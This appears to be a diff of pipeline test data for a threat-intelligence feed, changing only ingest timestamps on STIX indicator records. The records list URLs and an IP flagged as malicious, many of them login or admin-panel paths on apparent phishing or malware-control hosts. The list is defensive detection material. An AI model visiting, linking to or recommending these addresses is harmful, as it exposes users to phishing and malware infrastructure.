"event": { - "ingested": "2021-12-13T08:38:40.024991900Z", + "ingested": "2021-12-14T14:57:43.118332789Z", "original": "{\"created\":\"2020-02-08T14:03:21.626Z\",\"description\":\"TS ID: 55298071960; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--d900b770-4f2f-4597-ba97-a3e62646eca8\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-94\"],\"modified\":\"2020-02-08T14:03:21.626Z\",\"name\":\"mal_url: http://xgkxc.xyz/P3/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://xgkxc.xyz/P3/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:03:21.626Z\"}", "category": "threat", "type": "indicator", 
@@ -19488,7 +19488,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024996400Z", + "ingested": "2021-12-14T14:57:43.118333289Z", "original": "{\"created\":\"2020-02-08T14:03:23.941Z\",\"description\":\"TS ID: 55298070427; iType: mal_url; State: active; Org: SBCLOUD; Source: CyberCrime\",\"id\":\"indicator--be5fb697-b554-4042-8185-f4148a5d02a2\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-93\"],\"modified\":\"2020-02-08T14:03:23.941Z\",\"name\":\"mal_url: http://boomcoins.ml/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://boomcoins.ml/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:03:23.941Z\"}", "category": "threat", "type": "indicator", @@ -19539,7 +19539,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025001600Z", + "ingested": "2021-12-14T14:57:43.118333787Z", "original": "{\"created\":\"2020-02-08T14:03:34.136Z\",\"description\":\"TS ID: 55298071042; iType: mal_url; State: active; Org: RouteLabel V.O.F.; Source: CyberCrime\",\"id\":\"indicator--31a6a6c3-f385-421f-9ebb-d5cdced1dfd5\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-30\"],\"modified\":\"2020-02-08T14:03:34.136Z\",\"name\":\"mal_url: http://asstubevideos.com/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://asstubevideos.com/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:03:34.136Z\"}", "category": "threat", "type": "indicator", 
@@ -19590,7 +19590,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025025700Z", + "ingested": "2021-12-14T14:57:43.118334222Z", "original": "{\"created\":\"2020-02-08T14:03:34.507Z\",\"description\":\"TS ID: 55298069289; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--8c9846cd-2a0b-40c3-91f2-5893c05b1560\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-67\"],\"modified\":\"2020-02-08T14:03:34.507Z\",\"name\":\"mal_url: http://f0397413.xsph.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0397413.xsph.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:03:34.507Z\"}", "category": "threat", "type": "indicator", @@ -19635,7 +19635,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025032100Z", + "ingested": "2021-12-14T14:57:43.118334614Z", "original": "{\"created\":\"2020-02-08T14:03:42.075Z\",\"description\":\"TS ID: 55298071476; iType: mal_ip; State: active; Source: CyberCrime\",\"id\":\"indicator--4e5ac673-3459-45d1-817e-d7aca2850c5e\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-02-08T14:03:42.075Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:03:42.075Z\"}", "category": "threat", "type": "indicator", 
@@ -19686,7 +19686,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025036400Z", + "ingested": "2021-12-14T14:57:43.118335140Z", "original": "{\"created\":\"2020-02-08T14:03:42.298Z\",\"description\":\"TS ID: 55298069324; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--8d463a9a-c285-4af6-91e8-bfd7e65d820f\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-70\"],\"modified\":\"2020-02-08T14:03:42.298Z\",\"name\":\"mal_url: http://f0396512.xsph.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0396512.xsph.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:03:42.298Z\"}", "category": "threat", "type": "indicator", @@ -19737,7 +19737,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025042Z", + "ingested": "2021-12-14T14:57:43.118335731Z", "original": "{\"created\":\"2020-02-08T14:03:46.901Z\",\"description\":\"TS ID: 55298070290; iType: mal_url; State: active; Org: Avguro Technologies Ltd. Hosting service provider; Source: CyberCrime\",\"id\":\"indicator--bf76b431-6b24-4b63-89d6-4f026a2e5169\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-63\"],\"modified\":\"2020-02-08T14:03:46.901Z\",\"name\":\"mal_url: http://j1043204.myjino.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://j1043204.myjino.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:03:46.901Z\"}", "category": "threat", "type": "indicator", 
@@ -19788,7 +19788,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025049400Z", + "ingested": "2021-12-14T14:57:43.118336220Z", "original": "{\"created\":\"2020-02-08T14:03:47.108Z\",\"description\":\"TS ID: 55298069358; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--646c9b00-80f7-4457-b2bc-1da854c211d6\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-72\"],\"modified\":\"2020-02-08T14:03:47.108Z\",\"name\":\"mal_url: http://f0387320.xsph.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0387320.xsph.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:03:47.108Z\"}", "category": "threat", "type": "indicator", @@ -19840,7 +19840,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025054100Z", + "ingested": "2021-12-14T14:57:43.118336730Z", "original": "{\"created\":\"2020-02-08T14:03:50.674Z\",\"description\":\"TS ID: 55298072749; iType: mal_url; State: active; Org: SpaceWeb CJSC; Source: CyberCrime\",\"id\":\"indicator--48ad83a8-cec1-4d85-a9fd-1b7f9308cb6a\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-75\"],\"modified\":\"2020-02-08T14:03:50.674Z\",\"name\":\"mal_url: http://rqx10504bc.temp.swtest.ru/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://rqx10504bc.temp.swtest.ru/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:03:50.674Z\"}", "category": "threat", "type": "indicator", 
@@ -19892,7 +19892,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025058900Z", + "ingested": "2021-12-14T14:57:43.118337212Z", "original": "{\"created\":\"2020-02-08T14:03:53.621Z\",\"description\":\"TS ID: 55298069555; iType: mal_url; State: active; Org: OOO Network of data-centers Selectel; Source: CyberCrime\",\"id\":\"indicator--8e98212b-20f2-404f-804b-8ab7519c5683\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-75\"],\"modified\":\"2020-02-08T14:03:53.621Z\",\"name\":\"mal_url: http://j6g3fzp.5k5.ru/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://j6g3fzp.5k5.ru/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:03:53.621Z\"}", "category": "threat", "type": "indicator", @@ -19943,7 +19943,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025062500Z", + "ingested": "2021-12-14T14:57:43.118337594Z", "original": "{\"created\":\"2020-02-08T14:03:58.176Z\",\"description\":\"TS ID: 55298069681; iType: mal_url; State: active; Org: Tencent Cloud Computing (Beijing) Co.; Source: CyberCrime\",\"id\":\"indicator--395e83ba-96c1-45d2-b4b2-c065af5547fe\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-02-08T14:03:58.176Z\",\"name\":\"mal_url: http://stableupdater.ru.com/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://stableupdater.ru.com/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:03:58.176Z\"}", "category": "threat", "type": "indicator", 
@@ -19995,7 +19995,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025067500Z", + "ingested": "2021-12-14T14:57:43.118337973Z", "original": "{\"created\":\"2020-02-08T14:03:58.41Z\",\"description\":\"TS ID: 55298072652; iType: mal_url; State: active; Org: Netrouting; Source: CyberCrime\",\"id\":\"indicator--84dceb2a-fb38-4d98-9005-7f05460e8f3a\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-48\"],\"modified\":\"2020-02-08T14:03:58.41Z\",\"name\":\"mal_url: http://209.182.217.85/auth.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://209.182.217.85/auth.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:03:58.41Z\"}", "category": "threat", "type": "indicator", @@ -20047,7 +20047,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025074900Z", + "ingested": "2021-12-14T14:57:43.118338525Z", "original": "{\"created\":\"2020-02-08T14:04:30.627Z\",\"description\":\"TS ID: 55298073012; iType: mal_url; State: active; Org: JSC Digital Network; Source: CyberCrime\",\"id\":\"indicator--ca97a773-4de3-4c9d-8f4c-b7350a615c45\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-02-08T14:04:30.627Z\",\"name\":\"mal_url: http://fentq.org/x/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://fentq.org/x/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:04:30.627Z\"}", "category": "threat", "type": "indicator", 
@@ -20099,7 +20099,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025082200Z", + "ingested": "2021-12-14T14:57:43.118338975Z", "original": "{\"created\":\"2020-02-08T14:04:30.659Z\",\"description\":\"TS ID: 55298072708; iType: mal_url; State: active; Org: Tencent Cloud Computing (Beijing) Co.; Source: CyberCrime\",\"id\":\"indicator--d0653208-3d17-48c8-a47d-a6dede383ad8\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-88\"],\"modified\":\"2020-02-08T14:04:30.659Z\",\"name\":\"mal_url: http://castmart.ga/~zadmin/beta/aps/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://castmart.ga/~zadmin/beta/aps/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:04:30.659Z\"}", "category": "threat", "type": "indicator", @@ -20144,7 +20144,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025089500Z", + "ingested": "2021-12-14T14:57:43.118339447Z", "original": "{\"created\":\"2020-02-08T14:04:30.733Z\",\"description\":\"TS ID: 55298072377; iType: mal_ip; State: active; Org: CyrusOne LLC; Source: CyberCrime\",\"id\":\"indicator--7873494f-24fb-42a6-ae17-299b9825e220\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-22\"],\"modified\":\"2020-02-08T14:04:30.733Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:04:30.733Z\"}", "category": "threat", "type": "indicator", 
@@ -20196,7 +20196,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025096700Z", + "ingested": "2021-12-14T14:57:43.118339898Z", "original": "{\"created\":\"2020-02-08T14:04:30.81Z\",\"description\":\"TS ID: 55298072245; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--14e760f3-eb76-412c-ab7b-8267bd65deb5\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-83\"],\"modified\":\"2020-02-08T14:04:30.81Z\",\"name\":\"mal_url: http://hanmha.com/drunk/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://hanmha.com/drunk/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:04:30.81Z\"}", "category": "threat", "type": "indicator", @@ -20248,7 +20248,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025103900Z", + "ingested": "2021-12-14T14:57:43.118340364Z", "original": "{\"created\":\"2020-02-08T14:04:30.84Z\",\"description\":\"TS ID: 55298072104; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--8a5aa5ab-e8ec-4641-9cfb-179df3bede39\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-02-08T14:04:30.84Z\",\"name\":\"mal_url: http://trouserlanditd.com/dabs/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://trouserlanditd.com/dabs/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:04:30.84Z\"}", "category": "threat", "type": "indicator", 
@@ -20299,7 +20299,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025111Z", + "ingested": "2021-12-14T14:57:43.118341010Z", "original": "{\"created\":\"2020-02-08T14:04:30.927Z\",\"description\":\"TS ID: 55298071479; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--5bbb8e55-9eb7-4b8a-a7aa-d79c53a0e596\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-02-08T14:04:30.927Z\",\"name\":\"mal_url: http://89.160.20.156/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:04:30.927Z\"}", "category": "threat", "type": "indicator", @@ -20350,7 +20350,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025118600Z", + "ingested": "2021-12-14T14:57:43.118341435Z", "original": "{\"created\":\"2020-02-08T14:04:35.541Z\",\"description\":\"TS ID: 55298071733; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime\",\"id\":\"indicator--cd3bea2d-dd64-463e-ae03-2a582c2261f2\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-55\"],\"modified\":\"2020-02-08T14:04:35.541Z\",\"name\":\"mal_url: http://trust-oot.info/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://trust-oot.info/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:04:35.541Z\"}", "category": "threat", "type": "indicator", 
@@ -20395,7 +20395,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025125700Z", + "ingested": "2021-12-14T14:57:43.118341983Z", "original": "{\"created\":\"2020-02-08T14:04:35.641Z\",\"description\":\"TS ID: 55298069948; iType: mal_ip; State: active; Source: CyberCrime\",\"id\":\"indicator--543aeaab-e5f0-42bc-afa5-6cd3cc9a26ec\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-85\"],\"modified\":\"2020-02-08T14:04:35.641Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:04:35.641Z\"}", "category": "threat", "type": "indicator", @@ -20446,7 +20446,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025133Z", + "ingested": "2021-12-14T14:57:43.118342438Z", "original": "{\"created\":\"2020-02-08T14:04:37.657Z\",\"description\":\"TS ID: 55298071095; iType: mal_url; State: active; Org: RouteLabel V.O.F.; Source: CyberCrime\",\"id\":\"indicator--d2987902-59e6-4667-b011-f20e93e283d9\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-30\"],\"modified\":\"2020-02-08T14:04:37.657Z\",\"name\":\"mal_url: http://89.160.20.156/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:04:37.657Z\"}", "category": "threat", "type": "indicator", 
@@ -20498,7 +20498,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025140200Z", + "ingested": "2021-12-14T14:57:43.118342928Z", "original": "{\"created\":\"2020-02-08T14:04:41.785Z\",\"description\":\"TS ID: 55298072117; iType: mal_url; State: active; Org: CyrusOne LLC; Source: CyberCrime\",\"id\":\"indicator--093718d8-bb0e-4816-ab4b-c97cb95d5531\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-61\"],\"modified\":\"2020-02-08T14:04:41.785Z\",\"name\":\"mal_url: http://serviciotecnicoenperu.com/contactar/zz/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://serviciotecnicoenperu.com/contactar/zz/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:04:41.785Z\"}", "category": "threat", "type": "indicator", @@ -20550,7 +20550,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025147500Z", + "ingested": "2021-12-14T14:57:43.118343360Z", "original": "{\"created\":\"2020-02-08T14:04:43.759Z\",\"description\":\"TS ID: 55298071859; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--dfdca2f0-75cc-4e33-9045-e2ba136c0183\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-94\"],\"modified\":\"2020-02-08T14:04:43.759Z\",\"name\":\"mal_url: http://xgkxc.xyz/P4/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://xgkxc.xyz/P4/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:04:43.759Z\"}", "category": "threat", "type": "indicator", 
@@ -20601,7 +20601,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025154600Z", + "ingested": "2021-12-14T14:57:43.118343907Z", "original": "{\"created\":\"2020-02-08T14:04:43.783Z\",\"description\":\"TS ID: 55298070283; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--0e501865-d0a0-493b-8302-02efe0f2c5d1\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-95\"],\"modified\":\"2020-02-08T14:04:43.783Z\",\"name\":\"mal_url: http://kmfjlool.xyz/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://kmfjlool.xyz/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:04:43.783Z\"}", "category": "threat", "type": "indicator", @@ -20646,7 +20646,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025161800Z", + "ingested": "2021-12-14T14:57:43.118344345Z", "original": "{\"created\":\"2020-02-09T05:09:33.689Z\",\"description\":\"TS ID: 55300025372; iType: mal_ip; State: active; Org: Alibaba; Source: CyberCrime\",\"id\":\"indicator--91f46249-8fa5-4e88-bb38-0448b08b5448\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-81\"],\"modified\":\"2020-02-09T05:09:33.689Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-09T05:09:33.689Z\"}", "category": "threat", "type": "indicator", 
@@ -20697,7 +20697,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025166Z", + "ingested": "2021-12-14T14:57:43.118344724Z", "original": "{\"created\":\"2020-02-10T02:01:30.459Z\",\"description\":\"TS ID: 55303483956; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--07925c70-b345-4aa6-8f40-e19602cf0429\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-85\"],\"modified\":\"2020-02-10T02:01:30.459Z\",\"name\":\"mal_url: http://pentestblog.xyz/panel/login/\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://pentestblog.xyz/panel/login/']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-10T02:01:30.459Z\"}", "category": "threat", "type": "indicator", @@ -20749,7 +20749,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025171500Z", + "ingested": "2021-12-14T14:57:43.118345229Z", "original": "{\"created\":\"2020-02-10T02:01:36.571Z\",\"description\":\"TS ID: 55303483889; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--00195f28-4745-41a3-9710-7e2266b1270e\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-74\"],\"modified\":\"2020-02-10T02:01:36.571Z\",\"name\":\"mal_url: http://f0386817.xsph.ru/32cd6120/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0386817.xsph.ru/32cd6120/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-10T02:01:36.571Z\"}", "category": "threat", "type": "indicator", 
@@ -20800,7 +20800,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025177Z", + "ingested": "2021-12-14T14:57:43.118345705Z", "original": "{\"created\":\"2020-02-10T02:01:36.621Z\",\"description\":\"TS ID: 55303483880; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--eae0ef0b-3b77-401b-8835-4ad9cb97171d\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-70\"],\"modified\":\"2020-02-10T02:01:36.621Z\",\"name\":\"mal_url: http://f0395086.xsph.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0395086.xsph.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-10T02:01:36.621Z\"}", "category": "threat", "type": "indicator", @@ -20852,7 +20852,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025183400Z", + "ingested": "2021-12-14T14:57:43.118346154Z", "original": "{\"created\":\"2020-02-10T02:02:06.427Z\",\"description\":\"TS ID: 55303483638; iType: mal_url; State: active; Org: Choopa, LLC; Source: CyberCrime\",\"id\":\"indicator--05d25a1d-cf55-4b36-93ee-dbf618980b2f\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-44\"],\"modified\":\"2020-02-10T02:02:06.427Z\",\"name\":\"mal_url: http://89.160.20.156/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-10T02:02:06.427Z\"}", "category": "threat", "type": "indicator", 
@@ -20904,7 +20904,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025187300Z", + "ingested": "2021-12-14T14:57:43.118346853Z", "original": "{\"created\":\"2020-02-10T02:02:14.887Z\",\"description\":\"TS ID: 55303483942; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime\",\"id\":\"indicator--9af2b6ee-aec5-481a-8e93-2a7153fcf05e\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-67\"],\"modified\":\"2020-02-10T02:02:14.887Z\",\"name\":\"mal_url: http://worldatdoor.in/wire/32/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://worldatdoor.in/wire/32/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-10T02:02:14.887Z\"}", "category": "threat", "type": "indicator", @@ -20956,7 +20956,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025192600Z", + "ingested": "2021-12-14T14:57:43.118347384Z", "original": "{\"created\":\"2020-02-10T02:02:16.263Z\",\"description\":\"TS ID: 55303483899; iType: mal_url; State: active; Org: Avguro Technologies Ltd. Hosting service provider; Source: CyberCrime\",\"id\":\"indicator--1641ace0-37a5-4364-8400-e422b5cdbcec\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-64\"],\"modified\":\"2020-02-10T02:02:16.263Z\",\"name\":\"mal_url: http://wwe23pro.myjino.ru/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://wwe23pro.myjino.ru/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-10T02:02:16.263Z\"}", "category": "threat", "type": "indicator", 
@@ -21001,7 +21001,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025200200Z", + "ingested": "2021-12-14T14:57:43.118347795Z", "original": "{\"created\":\"2020-02-10T02:02:35.848Z\",\"description\":\"TS ID: 55303483868; iType: mal_ip; State: active; Source: CyberCrime\",\"id\":\"indicator--3e09e501-0b80-4de6-b5a9-1d30b5687a24\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-44\"],\"modified\":\"2020-02-10T02:02:35.848Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-10T02:02:35.848Z\"}", "category": "threat", "type": "indicator", @@ -21052,7 +21052,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025204500Z", + "ingested": "2021-12-14T14:57:43.118348271Z", "original": "{\"created\":\"2020-02-10T02:02:45.419Z\",\"description\":\"TS ID: 55303483940; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--85ab9568-e7f5-40c6-935d-8bdbe263970c\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-65\"],\"modified\":\"2020-02-10T02:02:45.419Z\",\"name\":\"mal_url: http://garex.xyz/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://garex.xyz/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-10T02:02:45.419Z\"}", "category": "threat", "type": "indicator", 
